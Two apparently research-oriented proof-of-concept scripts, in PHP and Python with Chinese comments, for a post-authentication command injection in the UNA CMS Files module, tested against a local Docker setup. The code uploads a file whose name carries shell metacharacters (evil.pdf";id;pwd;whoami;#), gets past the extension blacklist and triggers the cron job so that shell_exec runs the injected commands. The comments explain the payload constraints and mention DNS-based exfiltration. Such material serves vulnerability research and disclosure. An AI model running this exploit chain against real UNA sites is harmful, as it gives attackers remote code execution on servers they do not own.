File: unacms_UNA/exp/e2e_rce_verify_local.php
<?php
/**
 * UNA CMS BxFilesModule Command Injection — 本地 Docker 端到端真实链路验证
 *
 * 验证路径（全部走真实 UNA 代码，非模拟）：
 *   1. BxDolStorage::storeFileFromPath()  真实执行 getFileExt()=pathinfo 与 isValidExt() 黑名单校验
 *      （等价于攻击者通过 storage_uploader.php 上传恶意文件名）
 *   2. 恶意 ext 落库 bx_files_files.ext
 *   3. 构造 bx_files_main 条目 (data_processed=0) —— 等价于攻击者在 Files 模块创建文件条目
 *   4. 触发 BxDolService::call('bx_files','process_files_data') —— 与 sys_cron_jobs 中
 *      bx_files_process_data (BxFilesCronProcessData::processing) 完全一致
 *   5. serviceProcessFilesData() -> shell_exec("...--text \"<path>.<ext>\"")
 *
 * 注入 payload 约束（关键反证检查）：
 *   - $sFilePath = tmp/<remote_id>.<ext>，随后 @file_put_contents($sFilePath, ...) 先执行；
 *     若 ext 含 '/' 会使目标路径被解析为不存在的多级目录 -> 创建失败 -> file_exists 为 false
 *     -> continue，shell_exec 根本不会到达。因此可利用 payload 不得含 '/'。
 *   - 无 '/' payload 如 `pdf";id;#`：file_put_contents 成功创建空文件（含 ;"# 的文件名合法）
 *     -> shell_exec 执行 -> `"java"... --text "....pdf";id;#"` -> 引号闭合、; 分隔注入 id、# 注释尾部
 *
 * 证据：注入 `id` 的 stdout 被赋给 $sData -> updateFileData() 写回 bx_files_main.data 字段，
 *       读取该字段出现 "uid=" 即证明注入命令以 PHP 进程身份真实执行。
 */
error_reporting(E_ALL & ~E_DEPRECATED & ~E_NOTICE & ~E_WARNING);
ini_set('display_errors', 1);

$_SERVER['HTTP_HOST'] = 'localhost';
$_SERVER['HTTP_USER_AGENT'] = 'UNA';
$_SERVER['REQUEST_URI'] = '/';
$_ENV['UNA_SKIP_REDIRECT'] = '1';
$_ENV['UNA_SKIP_INSTALL_FOLDER_CHECK'] = '1';

$sRoot = '/var/www/html';
require($sRoot . '/inc/header.inc.php'); // header -> params.inc.php 已包含 profiles.inc.php

$oDb = BxDolDb::getInstance();

echo "═══════════════════════════════════════════════════════\n";
echo " UNA BxFilesModule CWE-78 — 本地端到端真实链路验证\n";
echo "═══════════════════════════════════════════════════════\n\n";

// ---------- Step 0: 环境前提 ----------
echo "[0] 环境前提检查\n";
echo "  BX_SYSTEM_JAVA = " . (defined('BX_SYSTEM_JAVA') ? constant('BX_SYSTEM_JAVA') : 'NOT DEFINED') . "\n";
$oStorage = BxDolStorage::getObjectInstance('bx_files_files');
if (!$oStorage) {
    echo "  [!!] bx_files_files storage 对象不可用 —— 无法验证\n";
    exit(1);
}
echo "  bx_files_files storage 对象 OK\n";

$iProfileId = (int)$oDb->getOne("SELECT `id` FROM `sys_profiles` WHERE `account_id` = 1 LIMIT 1");
if (!$iProfileId) $iProfileId = 1;
echo "  使用 profile_id = {$iProfileId}\n\n";

// ---------- Step 1: 真实存储路径上传恶意文件名 ----------
$ts = time();
// payload 不含 '/'（关键约束见文件头注释）；注入 id 的输出会回显到 bx_files_main.data
$sPayload = 'id;pwd;whoami';
$sEvilName = "evil.pdf\";{$sPayload};#";
$sTmpEvil = BX_DIRECTORY_PATH_TMP . 'upload_evil_' . $ts . '.dat';

echo "[1] 真实存储上传: storeFileFromPath(恶意文件名)\n";
echo "  上传文件名: {$sEvilName}\n";
$sExt = $oStorage->getFileExt($sEvilName);
echo "  getFileExt()=pathinfo 提取 ext = '{$sExt}'\n";
echo "  ext 含 shell 元字符: " . (preg_match('/["\'`;$|&(){}<>\\[\\]!#~\\\\*?\\n\\r]/', $sExt) ? "YES ✓" : "NO") . "\n";
echo "  ext 含 '/' : " . (strpos($sExt, '/') !== false ? "YES (将阻断)" : "NO ✓ (shell_exec 可达)") . "\n";

// 真实待上传内容 — 注意: HelperPath::getName() 返回的是『本地路径的 basename』，
// 因此本地临时文件必须命名为恶意文件名，pathinfo 提取的 ext 才会是注入载荷。
$sTmpEvil = BX_DIRECTORY_PATH_TMP . $sEvilName;
if (false === @file_put_contents($sTmpEvil, "UNA RCE e2e test content\n")) {
    echo "[!!] 无法在 tmp 创建恶意名临时文件\n";
    exit(1);
}

// real store — 内部执行 isValidExt(): ext_mode=deny-allow, isDeniedExt() -> in_array('pdf";id;pwd;whoami;#', sys_files_ext_dangerous 展开列表)
$iFileId = $oStorage->storeFileFromPath($sTmpEvil, false /*public*/, $iProfileId);
@unlink($sTmpEvil);
if (!$iFileId) {
    echo "  [!!] storeFileFromPath 失败: " . $oStorage->getErrorString() . "\n";
    exit(1);
}
echo "  storeFileFromPath 返回 file_id = {$iFileId}  =>  恶意 ext 通过黑名单并完成存储\n";

// 读取落库的 ext
$aFile = $oStorage->getFile($iFileId);
echo "  DB bx_files_files.ext = '{$aFile['ext']}'  (shell 元字符已落库)\n\n";

// ---------- Step 2: 创建 bx_files_main 条目 data_processed=0 ----------
echo "[2] 创建 bx_files_main 条目 (data_processed=0, file_id={$iFileId})\n";
$iNow = time();
$oDb->query("INSERT INTO `bx_files_main` 
    (`author`,`added`,`changed`,`file_id`,`title`,`cat`,`desc`,`data`,`data_processed`,`labels`,`location`,`allow_view_to`,`status`,`status_admin`,`type`)
    VALUES (:author, :now, :now, :file_id, 'e2e rce test', 0, '', '', 0, '', '', 3, 'active', 'active', 'file')", [
    'author' => $iProfileId,
    'now' => $iNow,
    'file_id' => $iFileId,
]);
$iContentId = (int)$oDb->lastId();
if (!$iContentId) {
    echo "  [!!] bx_files_main 插入失败: " . $oDb->getErrorMessage() . "\n";
    exit(1);
}
$iCnt = (int)$oDb->getOne("SELECT COUNT(*) FROM `bx_files_main` WHERE `data_processed` = 0");
echo "  新条目 content_id = {$iContentId}, 当前 data_processed=0 待处理数 = {$iCnt}\n\n";

// ---------- Step 3: 触发 cron 服务 (与 BxFilesCronProcessData::processing 相同) ----------
echo "[3] 触发 BxDolService::call('bx_files','process_files_data') ...\n";
$mRes = BxDolService::call('bx_files', 'process_files_data', array(3));
echo "  service 返回: " . var_export($mRes, true) . "\n\n";

// ---------- Step 4: 验证注入结果 ----------
echo "[4] 验证注入命令执行结果\n";
$aRow = $oDb->getRow("SELECT `id`,`data_processed`,`data` FROM `bx_files_main` WHERE `id` = {$iContentId}");
$iProc = (int)$aRow['data_processed'];
$sData = $aRow['data'];
echo "  条目 {$iContentId}: data_processed={$iProc}\n";
echo "  data 字段内容:\n";
echo "  ---------------------------------\n";
echo "  " . str_replace("\n", "\n  ", trim((string)$sData)) . "\n";
echo "  ---------------------------------\n";
if (preg_match('/^uid=\d+/m', (string)$sData))
    echo "\n  >>> 命令注入 → RCE 确认: 注入 'id' 的 stdout 已通过 shell_exec 回写到 data 字段 <<<\n";
else
    echo "\n  [!!] data 字段未发现 uid= 输出 —— 需进一步核查（如 java 是否占用 stdout、路径可达性等）\n";

// 清理：删除测试 storage 文件记录（保留内容条目便于人工复核）
// $oStorage->deleteFile($iFileId);
echo "\n[DONE]\n";

File: unacms_UNA/exp/e2e_rce_verify_local.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
UNA CMS BxFilesModule CWE-78 Command Injection — 本地 Docker 端到端验证 (Python 版)
=============================================================================
验证链（全部使用真实 UNA 代码路径）:
  1. HTTP 真实登录态（复用 CLI 生成的 memberSession —— post-auth 前提）
  2. HTTP 真实上传入口 storage_uploader.php (uo=sys_html5, so=bx_files_files)
     —— HTML5 uploader 走 `file` 参数 -> BxDolStorage::storeFileFromXhr -> storeFile()
        （与前端浏览器行为一致；文件名经 URL 编码传输、服务端解码后保留原始 shell 元字符）
  3. 存储层真实校验: pathinfo() 保留元字符 + deny-allow 黑名单 in_array 精确匹配被绕过
     -> 恶意 ext 原样落库 bx_files_files.ext
  4. 以数据层创建 bx_files_main 条目 (data_processed=0) —— 等价于用户在前端提交文件条目
  5. 触发 cron service: BxDolService::call('bx_files', 'process_files_data')
     —— 与 sys_cron_jobs.bx_files_process_data (BxFilesCronProcessData::processing) 完全一致
     -> serviceProcessFilesData() -> shell_exec("...--text \"<tmp>/<remote_id>.<ext>\"")
  6. 注入命令 stdout 经 shell_exec 回写 bx_files_main.data —— 读取到 uid= 即 RCE 确认

关键可利用性约束（实测确认）:
  - 注入 payload 不可含 '/'：$sFilePath 随后会被 @file_put_contents() 当作多级路径创建，
    含 '/' 时中间目录不存在 -> 创建失败 -> file_exists()=false -> continue，
    shell_exec 根本不会到达。报告中的 curl/wget URL(含 "//") OOB payload 属不可达形式；
    无 '/' 内联 payload (pdf";id;#) 与 DNS 外带 (nslookup/ping 域名无 '/') 均可达。
"""
import subprocess
import sys
import time
import urllib.parse
import json

import requests

TARGET = "http://localhost:8080"
WEB = "una-web-1"
DB = "una-db-1"
MYSQL = ["docker", "exec", DB, "mysql", "-uuna", "-puna123", "una", "-N", "-e"]

C = {
    "G": "\033[92m", "R": "\033[91m", "Y": "\033[93m",
    "B": "\033[94m", "BD": "\033[1m", "X": "\033[0m",
}


def run(cmd, **kw):
    return subprocess.run(cmd, capture_output=True, text=True, **kw)


def sh(cmd):
    return run(["sh", "-c", cmd])


def mysql(q):
    r = run(MYSQL + [q])
    return r.stdout.strip()


def log(msg, level="I"):
    pre = {"I": f"{C['B']}[*]{C['X']}", "O": f"{C['G']}[+]{C['X']}",
           "F": f"{C['R']}[-]{C['X']}", "W": f"{C['Y']}[!]{C['X']}"}
    print(f"{pre[level]} {msg}")


def get_session():
    """CLI 内以 admin 身份登录 -> 返回 memberSession cookie 值（post-auth 前提）"""
    r = run(["docker", "exec", WEB, "php", "/var/www/html/gen_session_cli.php"])
    for line in r.stdout.splitlines():
        if line.startswith("memberSession="):
            return line.split("=", 1)[1].strip()
    return None


def upload_xhr(session_cookie, evil_filename, content=b"UNA RCE python e2e"):
    """真实 HTML5 上传：file 参数(URL编码) + 原始 body（php://input, storeFileFromXhr）"""
    uid = f"pye2e_{int(time.time())}_{os_urandom_hex()}"
    url = f"{TARGET}/storage_uploader.php"
    params = {"uo": "sys_html5", "so": "bx_files_files", "uid": uid,
              "a": "upload", "m": "1", "f": "json",
              "file": evil_filename}  # requests 会自动 URL 编码 file 参数
    hdr = {"Cookie": f"memberSession={urllib.parse.quote(session_cookie)}; memberID=1"}
    try:
        r = requests.post(url, params=params, data=content, headers=hdr, timeout=30)
        return r.status_code, r.text
    except Exception as e:
        return 0, str(e)


def os_urandom_hex():
    import os
    return os.urandom(4).hex()


def main():
    print(f"{C['BD']}═══════════════════════════════════════════════════════════{C['X']}")
    print(f"{C['BD']} UNA BxFilesModule CWE-78 — Python 端到端本地验证{C['X']}")
    print(f"{C['BD']}═══════════════════════════════════════════════════════════{C['X']}\n")

    # [0] 前置检查
    log("检查容器与模块状态")
    mod = mysql("SELECT enabled FROM sys_modules WHERE name='bx_files'")
    cron = mysql("SELECT COUNT(*) FROM sys_cron_jobs WHERE name='bx_files_process_data'")
    storage = mysql("SELECT COUNT(*) FROM sys_objects_storage WHERE object='bx_files_files'")
    if mod != "1" or cron != "1" or storage != "1":
        log(f"前置缺失 module={mod} cron={cron} storage={storage}", "F")
        return 1
    log("bx_files 模块已启用 / cron job 已注册 / storage 对象存在", "O")

    # [1] 获取登录态
    sess = get_session()
    if not sess:
        log("无法生成登录 session", "F")
        return 1
    log(f"获得合法登录会话 (post-auth 前提满足): memberSession={sess[:12]}...")

    # [2] 上传恶意文件名（真实 HTTP 入口）
    ts = int(time.time())
    # payload: 无 '/'（关键约束），注入 id 输出会回写 bx_files_main.data
    evil = 'evil.pdf";id;pwd;whoami;#'
    log(f"上传恶意文件名: {evil}")
    code, resp = upload_xhr(sess, evil)
    log(f"HTTP {code} 响应: {resp[:200]}")
    file_id = None
    try:
        j = json.loads(resp)
        if j.get("success") == 1:
            file_id = j.get("id")
            log(f"上传成功 file_id={file_id}", "O")
        else:
            log(f"上传响应异常: {j}", "F")
            return 1
    except Exception:
        log("上传未返回 JSON（可能 filename 解析被服务端截断）", "F")
        return 1

    # [3] 核对落库 ext
    row = mysql(f"SELECT file_name, ext FROM bx_files_files WHERE id={int(file_id)}")
    log(f"DB bx_files_files 落库: {row}")
    fn, ext = row.split("\t", 1)
    if ';' in ext and '"' in ext:
        log("恶意 ext（含 \\\" ; #）已原样落库 → pathinfo+in_array 绕过确认", "O")
    else:
        log(f"ext 未保留元字符（实际='{ext}'）→ 该上传路径在此版本被截断，链路终止", "F")
        return 1

    # [4] 创建 bx_files_main 条目 (data_processed=0)
    pid = mysql("SELECT id FROM sys_profiles WHERE account_id=1 LIMIT 1") or "1"
    q = ("INSERT INTO bx_files_main (author,added,changed,file_id,title,cat,`desc`,`data`,"
         "data_processed,labels,location,allow_view_to,status,status_admin,type) VALUES "
         f"({int(pid)},{ts},{ts},{int(file_id)},'pye2e rce',0,'','',0,'','',3,'active','active','file')")
    mysql(q)
    cid = mysql("SELECT id FROM bx_files_main WHERE title='pye2e rce' AND file_id=" + str(int(file_id)) +
                " ORDER BY id DESC LIMIT 1")
    if not cid:
        log("bx_files_main 条目插入失败", "F")
        return 1
    log(f"bx_files_main 条目 content_id={cid} (data_processed=0)", "O")

    # [5] 触发 cron service（等价 BxFilesCronProcessData::processing）
    trigger_php = r'''<?php
$_SERVER['HTTP_HOST']='localhost'; $_SERVER['HTTP_USER_AGENT']='UNA';
$_ENV['UNA_SKIP_REDIRECT']='1'; $_ENV['UNA_SKIP_INSTALL_FOLDER_CHECK']='1';
require('/var/www/html/inc/header.inc.php');
$m = BxDolService::call('bx_files', 'process_files_data', array(3));
echo "SERVICE_RET=" . var_export($m, true) . "\n";
'''
    with open("/home/duskto/漏挖复审/UNA/tmp_trigger_cron.php", "w") as f:
        f.write(trigger_php)
    r = run(["docker", "exec", WEB, "php", "/var/www/html/tmp_trigger_cron.php"])
    log(f"cron service 触发输出: {r.stdout.strip()[:120]}")

    # [6] 读回写 data 字段验证注入
    time.sleep(0.3)
    row = mysql(f"SELECT data_processed, data FROM bx_files_main WHERE id={int(cid)}")
    dp, data = row.split("\t", 1)
    print(f"\n  {C['BD']}条目 {cid}: data_processed={dp}{C['X']}")
    print(f"  {C['BD']}data 字段内容:{C['X']}\n  " + data.replace("\n", "\n  "))
    if "uid=" in data and "root" in data:
        print(f"\n  {C['G']}{C['BD']}>>> 命令注入 → RCE 确认：注入的 id 命令 stdout 已通过 "
              f"shell_exec 回写 data 字段 <<<{C['X']}")
        return 0
    log("data 字段未发现 uid= 输出 —— 注入未执行", "F")
    return 1


if __name__ == "__main__":
    sys.exit(main())
